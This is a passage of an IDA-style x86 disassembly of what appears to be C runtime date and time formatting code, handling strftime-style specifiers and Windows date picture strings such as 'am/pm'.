mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+38h]
push eax
call __store_str
add esp, 0Ch
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438C5B: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439135�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+68h]
push eax
call __store_str
add esp, 0Ch
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438C7E: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439165�o
cmp dword_4F4B20, 0
jz short loc_438D06
mov dword_4F4B20, 0
mov ecx, [ebp+arg_10]
push ecx ; int
mov edx, [ebp+arg_C]
push edx ; int
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+arg_10]
mov eax, [edx+0A4h]
push eax ; Str1
call sub_439390
add esp, 14h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jnz short loc_438CC0
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438CC0: ; CODE XREF: sub_438BC0+F9�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 20h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
mov ecx, [ebp+arg_10]
push ecx ; int
mov edx, [ebp+arg_C]
push edx ; int
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+arg_10]
mov eax, [edx+0A8h]
push eax ; Str1
call sub_439390
add esp, 14h
jmp short loc_438D79
; ---------------------------------------------------------------------------
loc_438D06: ; CODE XREF: sub_438BC0+C5�j
mov ecx, [ebp+arg_10]
push ecx ; int
mov edx, [ebp+arg_C]
push edx ; int
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+arg_10]
mov eax, [edx+0A0h]
push eax ; Str1
call sub_439390
add esp, 14h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jnz short loc_438D35
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438D35: ; CODE XREF: sub_438BC0+16E�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 20h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
mov ecx, [ebp+arg_10]
push ecx ; int
mov edx, [ebp+arg_C]
push edx ; int
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+arg_10]
mov eax, [edx+0A8h]
push eax ; Str1
call sub_439390
add esp, 14h
loc_438D79: ; CODE XREF: sub_438BC0+144�j
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438D7E: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439169�o
mov ecx, dword_4F4B20
mov dword_4F4B24, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+arg_4]
mov edx, [ecx+0Ch]
push edx
call __store_num
add esp, 10h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438DA8: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439139�o
mov eax, dword_4F4B20
mov dword_4F4B24, eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 2
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
push ecx
call __store_num
add esp, 10h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438DD0: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:0043913D�o
mov edx, dword_4F4B20
mov dword_4F4B24, edx
mov eax, [ebp+arg_4]
mov eax, [eax+8]
cdq
mov ecx, 0Ch
idiv ecx
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jnz short loc_438DFA
mov [ebp+var_4], 0Ch
loc_438DFA: ; CODE XREF: sub_438BC0+231�j
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+var_4]
push ecx
call __store_num
add esp, 10h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438E15: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:0043916D�o
mov edx, dword_4F4B20
mov dword_4F4B24, edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 3
mov edx, [ebp+arg_4]
mov eax, [edx+1Ch]
add eax, 1
push eax
call __store_num
add esp, 10h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438E42: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439171�o
mov ecx, dword_4F4B20
mov dword_4F4B24, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+arg_4]
mov edx, [ecx+10h]
add edx, 1
push edx
call __store_num
add esp, 10h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438E6F: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439141�o
mov eax, dword_4F4B20
mov dword_4F4B24, eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 2
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
push ecx
call __store_num
add esp, 10h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438E97: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439175�o
mov edx, [ebp+arg_4]
cmp dword ptr [edx+8], 0Bh
jg short loc_438EBC
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+98h]
push eax
call __store_str
add esp, 0Ch
jmp short loc_438ED6
; ---------------------------------------------------------------------------
loc_438EBC: ; CODE XREF: sub_438BC0+2DE�j
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_10]
mov ecx, [eax+9Ch]
push ecx
call __store_str
add esp, 0Ch
loc_438ED6: ; CODE XREF: sub_438BC0+2FA�j
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438EDB: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439145�o
mov edx, dword_4F4B20
mov dword_4F4B24, edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 2
mov edx, [ebp+arg_4]
mov eax, [edx]
push eax
call __store_num
add esp, 10h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438F04: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439149�o
mov ecx, dword_4F4B20
mov dword_4F4B24, ecx
mov edx, [ebp+arg_4]
mov eax, [edx+18h]
mov [ebp+var_8], eax
jmp short loc_438F6D
; ---------------------------------------------------------------------------
loc_438F1B: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439179�o
mov ecx, dword_4F4B20
mov dword_4F4B24, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 1
mov ecx, [ebp+arg_4]
mov edx, [ecx+18h]
push edx
call __store_num
add esp, 10h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438F45: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:0043914D�o
mov eax, dword_4F4B20
mov dword_4F4B24, eax
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx+18h], 0
jnz short loc_438F61
mov [ebp+var_8], 6
jmp short loc_438F6D
; ---------------------------------------------------------------------------
loc_438F61: ; CODE XREF: sub_438BC0+396�j
mov edx, [ebp+arg_4]
mov eax, [edx+18h]
sub eax, 1
mov [ebp+var_8], eax
loc_438F6D: ; CODE XREF: sub_438BC0+359�j
; sub_438BC0+39F�j
mov ecx, [ebp+arg_4]
mov edx, [ecx+1Ch]
cmp edx, [ebp+var_8]
jge short loc_438F81
mov [ebp+var_4], 0
jmp short loc_438FAE
; ---------------------------------------------------------------------------
loc_438F81: ; CODE XREF: sub_438BC0+3B6�j
mov eax, [ebp+arg_4]
mov eax, [eax+1Ch]
cdq
mov ecx, 7
idiv ecx
mov [ebp+var_4], eax
mov edx, [ebp+arg_4]
mov eax, [edx+1Ch]
cdq
mov ecx, 7
idiv ecx
cmp edx, [ebp+var_8]
jl short loc_438FAE
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_438FAE: ; CODE XREF: sub_438BC0+3BF�j
; sub_438BC0+3E3�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 2
mov edx, [ebp+var_4]
push edx
call __store_num
add esp, 10h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438FC9: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:0043917D�o
cmp dword_4F4B20, 0
jz short loc_439000
mov dword_4F4B20, 0
mov eax, [ebp+arg_10]
push eax ; int
mov ecx, [ebp+arg_C]
push ecx ; int
mov edx, [ebp+arg_8]
push edx ; int
mov eax, [ebp+arg_4]
push eax ; int
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A4h]
push edx ; Str1
call sub_439390
add esp, 14h
jmp short loc_439022
; ---------------------------------------------------------------------------
loc_439000: ; CODE XREF: sub_438BC0+410�j
mov eax, [ebp+arg_10]
push eax ; int
mov ecx, [ebp+arg_C]
push ecx ; int
mov edx, [ebp+arg_8]
push edx ; int
mov eax, [ebp+arg_4]
push eax ; int
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A0h]
push edx ; Str1
call sub_439390
add esp, 14h
loc_439022: ; CODE XREF: sub_438BC0+43E�j
jmp loc_439128
; ---------------------------------------------------------------------------
loc_439027: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439151�o
mov dword_4F4B20, 0
mov eax, [ebp+arg_10]
push eax ; int
mov ecx, [ebp+arg_C]
push ecx ; int
mov edx, [ebp+arg_8]
push edx ; int
mov eax, [ebp+arg_4]
push eax ; int
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A8h]
push edx ; Str1
call sub_439390
add esp, 14h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_439058: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439181�o
mov eax, dword_4F4B20
mov dword_4F4B24, eax
mov ecx, [ebp+arg_4]
mov eax, [ecx+14h]
cdq
mov ecx, 64h
idiv ecx
mov [ebp+var_4], edx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+var_4]
push ecx
call __store_num
add esp, 10h
jmp loc_439128
; ---------------------------------------------------------------------------
loc_43908E: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439155�o
mov edx, dword_4F4B20
mov dword_4F4B24, edx
mov eax, [ebp+arg_4]
mov eax, [eax+14h]
cdq
mov ecx, 64h
idiv ecx
mov ecx, eax
add ecx, 13h
imul ecx, 64h
mov edx, [ebp+arg_4]
mov eax, [edx+14h]
cdq
mov esi, 64h
idiv esi
add ecx, edx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 4
mov edx, [ebp+var_4]
push edx
call __store_num
add esp, 10h
jmp short loc_439128
; ---------------------------------------------------------------------------
loc_4390DB: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439159�o
call ___tzset
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
cmp dword ptr [edx+20h], 0
setnz al
mov ecx, off_455734[eax*4]
push ecx
call __store_str
add esp, 0Ch
jmp short loc_439128
; ---------------------------------------------------------------------------
loc_439106: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:off_43912D�o
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 25h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
loc_439128: ; CODE XREF: sub_438BC0+1B�j
; sub_438BC0+2C�j ...
pop esi
mov esp, ebp
pop ebp
retn
sub_438BC0 endp
; ---------------------------------------------------------------------------
off_43912D dd offset loc_439106 ; DATA XREF: sub_438BC0+2C�r
dd offset loc_438C15
dd offset loc_438C5B
dd offset loc_438DA8
dd offset loc_438DD0
dd offset loc_438E6F
dd offset loc_438EDB
dd offset loc_438F04
dd offset loc_438F45
dd offset loc_439027
dd offset loc_43908E
dd offset loc_4390DB
dd offset loc_438BF3
dd offset loc_438C38
dd offset loc_438C7E
dd offset loc_438D7E
dd offset loc_438E15
dd offset loc_438E42
dd offset loc_438E97
dd offset loc_438F1B
dd offset loc_438FC9
dd offset loc_439058
dd offset loc_439128
byte_439189 db 0 ; DATA XREF: sub_438BC0+26�r
dw 1616h
dd 6 dup(16161616h), 16020116h, 16161616h, 16160403h, 16160516h
dd 6161616h, 8160716h, 160B0A09h, 16161616h, 0E0D0C16h
dd 1616160Fh, 16101616h, 16161116h, 16161612h, 13161616h
dd 0CC0B1514h
; [00000048 BYTES: COLLAPSED FUNCTION __store_str. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AD BYTES: COLLAPSED FUNCTION __store_num. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AC BYTES: COLLAPSED FUNCTION __store_number. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_439390(char *Str1,int,int,int,int)
sub_439390 proc near ; CODE XREF: sub_438BC0+EB�p
; sub_438BC0+13C�p ...
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
Str1 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 30h
loc_439396: ; CODE XREF: sub_439390+383�j
; sub_439390:loc_4397F5�j ...
mov eax, [ebp+Str1]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz loc_4398A5
mov edx, [ebp+arg_C]
cmp dword ptr [edx], 0
jz loc_4398A5
mov [ebp+var_8], 0
mov dword_4F4B24, 0
mov [ebp+var_C], 0
mov eax, [ebp+Str1]
mov [ebp+var_4], eax
jmp short loc_4393D6
; ---------------------------------------------------------------------------
loc_4393CD: ; CODE XREF: sub_439390+5F�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_4393D6: ; CODE XREF: sub_439390+3B�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
mov ecx, [ebp+Str1]
movsx edx, byte ptr [ecx]
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
cmp eax, edx
jnz short loc_4393F1
jmp short loc_4393CD
; ---------------------------------------------------------------------------
loc_4393F1: ; CODE XREF: sub_439390+5D�j
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+Str1]
movsx ecx, byte ptr [eax]
mov [ebp+var_14], ecx
mov edx, [ebp+var_14]
sub edx, 27h
mov [ebp+var_14], edx
cmp [ebp+var_14], 52h
ja loc_4397FA
mov ecx, [ebp+var_14]
xor eax, eax
mov al, ds:byte_4398D5[ecx]
jmp ds:off_4398A9[eax*4]
loc_439428: ; DATA XREF: .text:004398B5�o
mov edx, [ebp+var_C]
mov [ebp+var_18], edx
mov eax, [ebp+var_18]
sub eax, 1
mov [ebp+var_18], eax
cmp [ebp+var_18], 3
ja short loc_439461
mov ecx, [ebp+var_18]
jmp ds:off_439928[ecx*4]
loc_439447: ; DATA XREF: .text:off_439928�o
mov dword_4F4B24, 1
loc_439451: ; CODE XREF: sub_439390+B0�j
; DATA XREF: .text:0043992C�o
mov [ebp+var_8], 6Dh
jmp short loc_439461
; ---------------------------------------------------------------------------
loc_439457: ; CODE XREF: sub_439390+B0�j
; DATA XREF: .text:00439930�o
mov [ebp+var_8], 62h
jmp short loc_439461
; ---------------------------------------------------------------------------
loc_43945D: ; CODE XREF: sub_439390+B0�j
; DATA XREF: .text:00439934�o
mov [ebp+var_8], 42h
loc_439461: ; CODE XREF: sub_439390+AB�j
; sub_439390+C5�j ...
jmp loc_4397FA
; ---------------------------------------------------------------------------
loc_439466: ; CODE XREF: sub_439390+91�j
; DATA XREF: .text:004398B9�o
mov edx, [ebp+var_C]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
sub eax, 1
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 3
ja short loc_43949F
mov ecx, [ebp+var_1C]
jmp ds:off_439938[ecx*4]
loc_439485: ; CODE XREF: sub_439390+B0�j
; DATA XREF: .text:off_439938�o
mov dword_4F4B24, 1
loc_43948F: ; CODE XREF: sub_439390+B0�j
; sub_439390+EE�j
; DATA XREF: ...
mov [ebp+var_8], 64h
jmp short loc_43949F
; ---------------------------------------------------------------------------
loc_439495: ; CODE XREF: sub_439390+B0�j
; sub_439390+EE�j
; DATA XREF: ...
mov [ebp+var_8], 61h
jmp short loc_43949F
; ---------------------------------------------------------------------------
loc_43949B: ; CODE XREF: sub_439390+B0�j
; sub_439390+EE�j
; DATA XREF: ...
mov [ebp+var_8], 41h
loc_43949F: ; CODE XREF: sub_439390+E9�j
; sub_439390+103�j ...
jmp loc_4397FA
; ---------------------------------------------------------------------------
loc_4394A4: ; CODE XREF: sub_439390+91�j
; DATA XREF: .text:004398CD�o
mov edx, [ebp+var_C]
mov [ebp+var_20], edx
cmp [ebp+var_20], 2
jz short loc_4394B8
cmp [ebp+var_20], 4
jz short loc_4394BE
jmp short loc_4394C2
; ---------------------------------------------------------------------------
loc_4394B8: ; CODE XREF: sub_439390+11E�j
mov [ebp+var_8], 79h
jmp short loc_4394C2
; ---------------------------------------------------------------------------
loc_4394BE: ; CODE XREF: sub_439390+124�j
mov [ebp+var_8], 59h
loc_4394C2: ; CODE XREF: sub_439390+126�j
; sub_439390+12C�j
jmp loc_4397FA
; ---------------------------------------------------------------------------
loc_4394C7: ; CODE XREF: sub_439390+91�j
; DATA XREF: .text:004398BD�o
mov eax, [ebp+var_C]
mov [ebp+var_24], eax
cmp [ebp+var_24], 1
jz short loc_4394DB
cmp [ebp+var_24], 2
jz short loc_4394E5
jmp short loc_4394E9
; ---------------------------------------------------------------------------
loc_4394DB: ; CODE XREF: sub_439390+141�j
mov dword_4F4B24, 1
loc_4394E5: ; CODE XREF: sub_439390+147�j
mov [ebp+var_8], 49h
loc_4394E9: ; CODE XREF: sub_439390+149�j
jmp loc_4397FA
; ---------------------------------------------------------------------------
loc_4394EE: ; CODE XREF: sub_439390+91�j
; DATA XREF: .text:004398B1�o
mov ecx, [ebp+var_C]
mov [ebp+var_28], ecx
cmp [ebp+var_28], 1
jz short loc_439502
cmp [ebp+var_28], 2
jz short loc_43950C
jmp short loc_439510
; ---------------------------------------------------------------------------
loc_439502: ; CODE XREF: sub_439390+168�j
mov dword_4F4B24, 1
loc_43950C: ; CODE XREF: sub_439390+16E�j
mov [ebp+var_8], 48h
loc_439510: ; CODE XREF: sub_439390+170�j
jmp loc_4397FA
; ---------------------------------------------------------------------------
loc_439515: ; CODE XREF: sub_439390+91�j
; DATA XREF: .text:004398C1�o
mov edx, [ebp+var_C]
mov [ebp+var_2C], edx
cmp [ebp+var_2C], 1
jz short loc_439529
cmp [ebp+var_2C], 2
jz short loc_439533
jmp short loc_439537
; ---------------------------------------------------------------------------
loc_439529: ; CODE XREF: sub_439390+18F�j
mov dword_4F4B24, 1
loc_439533: ; CODE XREF: sub_439390+195�j
mov [ebp+var_8], 4Dh
loc_439537: ; CODE XREF: sub_439390+197�j
jmp loc_4397FA
; ---------------------------------------------------------------------------
loc_43953C: ; CODE XREF: sub_439390+91�j
; DATA XREF: .text:004398C5�o
mov eax, [ebp+var_C]
mov [ebp+var_30], eax
cmp [ebp+var_30], 1
jz short loc_439550
cmp [ebp+var_30], 2
jz short loc_43955A
jmp short loc_43955E
; ---------------------------------------------------------------------------
loc_439550: ; CODE XREF: sub_439390+1B6�j
mov dword_4F4B24, 1
loc_43955A: ; CODE XREF: sub_439390+1BC�j
mov [ebp+var_8], 53h
loc_43955E: ; CODE XREF: sub_439390+1BE�j
jmp loc_4397FA
; ---------------------------------------------------------------------------
loc_439563: ; CODE XREF: sub_439390+91�j
; DATA XREF: .text:004398AD�o
push offset aAmPm ; "am/pm"
mov ecx, [ebp+Str1]
push ecx ; Str1
call __strcmpi
add esp, 8
test eax, eax
jnz short loc_439583
mov edx, [ebp+Str1]
add edx, 5
mov [ebp+var_4], edx
jmp short loc_4395A1
; ---------------------------------------------------------------------------
loc_439583: ; CODE XREF: sub_439390+1E6�j
push offset aAP ; "a/p"
mov eax, [ebp+Str1]
push eax ; Str1
call __strcmpi
add esp, 8
test eax, eax
jnz short loc_4395A1
mov ecx, [ebp+Str1]
add ecx, 3
mov [ebp+var_4], ecx
loc_4395A1: ; CODE XREF: sub_439390+1F1�j
; sub_439390+206�j
mov [ebp+var_8], 70h
jmp loc_4397FA
; ---------------------------------------------------------------------------
loc_4395AA: ; CODE XREF: sub_439390+91�j
; DATA XREF: .text:004398C9�o
mov edx, [ebp+arg_4]
cmp dword ptr [edx+8], 0Bh
jg short loc_4395C1
mov eax, [ebp+arg_10]
mov ecx, [eax+98h]
mov [ebp+var_10], ecx
jmp short loc_4395CD
; ---------------------------------------------------------------------------
loc_4395C1: ; CODE XREF: sub_439390+221�j
mov edx, [ebp+arg_10]
mov eax, [edx+9Ch]
mov [ebp+var_10], eax
loc_4395CD: ; CODE XREF: sub_439390+22F�j
cmp [ebp+var_C], 1
jnz loc_43966B
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jbe loc_43966B
mov edx, [ebp+var_10]
xor eax, eax
mov al, [edx]
mov ecx, off_454E04
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_439637
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 1
jbe short loc_439637
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov eax, [ebp+var_10]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
sub ecx, 1
mov edx, [ebp+arg_C]
mov [edx], ecx
loc_439637: ; CODE XREF: sub_439390+26E�j
; sub_439390+276�j
mov eax, [ebp+arg_8]
mov ecx, [eax]
mov edx, [ebp+var_10]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
mov edx, [ebp+arg_C]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp loc_43970D
; ---------------------------------------------------------------------------
loc_43966B: ; CODE XREF: sub_439390+241�j
; sub_439390+24D�j ...
mov edx, [ebp+var_10]
movsx eax, byte ptr [edx]
test eax, eax
jz loc_43970D
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jbe loc_43970D
mov edx, [ebp+var_10]
xor eax, eax
mov al, [edx]
mov ecx, off_454E04
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_4396D9
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 1
jbe short loc_4396D9
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov eax, [ebp+var_10]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
sub ecx, 1
mov edx, [ebp+arg_C]
mov [edx], ecx
loc_4396D9: ; CODE XREF: sub_439390+310�j
; sub_439390+318�j
mov eax, [ebp+arg_8]
mov ecx, [eax]
mov edx, [ebp+var_10]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
mov edx, [ebp+arg_C]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp loc_43966B
; ---------------------------------------------------------------------------
loc_43970D: ; CODE XREF: sub_439390+2D6�j
; sub_439390+2E3�j ...
mov edx, [ebp+var_4]
mov [ebp+Str1], edx
jmp loc_439396
; ---------------------------------------------------------------------------
loc_439718: ; CODE XREF: sub_439390+91�j
; DATA XREF: .text:off_4398A9�o
mov eax, [ebp+var_C]
and eax, 1
test eax, eax
jz loc_4397EC
mov ecx, [ebp+Str1]
add ecx, [ebp+var_C]
mov [ebp+Str1], ecx
loc_43972F: ; CODE XREF: sub_439390+455�j
mov edx, [ebp+Str1]
movsx eax, byte ptr [edx]
test eax, eax
jz loc_4397EA
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jz loc_4397EA
mov edx, [ebp+Str1]
movsx eax, byte ptr [edx]
cmp eax, 27h
jnz short loc_439762
mov ecx, [ebp+Str1]
add ecx, 1
mov [ebp+Str1], ecx
jmp loc_4397EA
; ---------------------------------------------------------------------------
loc_439762: ; CODE XREF: sub_439390+3C2�j
mov edx, [ebp+Str1]
xor eax, eax
mov al, [edx]
mov ecx, off_454E04
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_4397B6
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 1
jbe short loc_4397B6
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov eax, [ebp+Str1]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov edx, [ebp+Str1]
add edx, 1
mov [ebp+Str1], edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
sub ecx, 1
mov edx, [ebp+arg_C]
mov [edx], ecx
loc_4397B6: ; CODE XREF: sub_439390+3ED�j
; sub_439390+3F5�j
mov eax, [ebp+arg_8]
mov ecx, [eax]
mov edx, [ebp+Str1]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+Str1]
add ecx, 1
mov [ebp+Str1], ecx
mov edx, [ebp+arg_C]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp loc_43972F
; ---------------------------------------------------------------------------
loc_4397EA: ; CODE XREF: sub_439390+3A7�j
; sub_439390+3B3�j ...
jmp short loc_4397F5
; ---------------------------------------------------------------------------
loc_4397EC: ; CODE XREF: sub_439390+390�j
mov edx, [ebp+Str1]
add edx, [ebp+var_C]
mov [ebp+Str1], edx
loc_4397F5: ; CODE XREF: sub_439390:loc_4397EA�j
jmp loc_439396
; ---------------------------------------------------------------------------
loc_4397FA: ; CODE XREF: sub_439390+80�j
; sub_439390+91�j ...
movsx eax, [ebp+var_8]
test eax, eax
jz short loc_439826
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov dl, [ebp+var_8]
push edx
call sub_438BC0
add esp, 14h
mov eax, [ebp+var_4]
mov [ebp+Str1], eax
jmp short loc_4398A0
; ---------------------------------------------------------------------------
loc_439826: ; CODE XREF: sub_439390+470�j
mov ecx, [ebp+Str1]
xor edx, edx
mov dl, [ecx]
mov eax, off_454E04
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8000h
test ecx, ecx
jz short loc_439871
mov edx, [ebp+arg_8]
mov eax, [edx]
mov ecx, [ebp+Str1]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_8]
mov [edx], ecx
mov eax, [ebp+Str1]
add eax, 1
mov [ebp+Str1], eax
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
loc_439871: ; CODE XREF: sub_439390+4B0�j
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov eax, [ebp+Str1]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov edx, [ebp+Str1]
add edx, 1
mov [ebp+Str1], edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
sub ecx, 1
mov edx, [ebp+arg_C]
mov [edx], ecx
loc_4398A0: ; CODE XREF: sub_439390+494�j
jmp loc_439396
; ---------------------------------------------------------------------------
